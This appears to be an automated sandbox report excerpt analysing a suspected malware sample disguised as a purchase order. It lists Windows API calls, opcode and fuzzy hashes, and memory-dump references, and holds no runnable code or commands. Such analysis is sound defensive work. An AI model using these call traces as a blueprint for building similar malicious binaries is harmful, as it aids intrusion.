                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1065087418-0
                                                                                                      • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                      • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1381354015-0
                                                                                                      • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                      • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                      • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                      • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                      • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004301AD
                                                                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1297977491-0
                                                                                                      • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                      • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2154303073-0
                                                                                                      • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                      • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                      APIs
                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3150196962-0
                                                                                                      • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                      • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                      APIs
                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3154509469-0
                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                      APIs
                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4232544981-0
                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                      APIs
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                      • String ID:
                                                                                                      • API String ID: 3859505661-0
                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                      APIs
                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                      • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                      APIs
                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumNamesResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3334572018-0
                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                      APIs
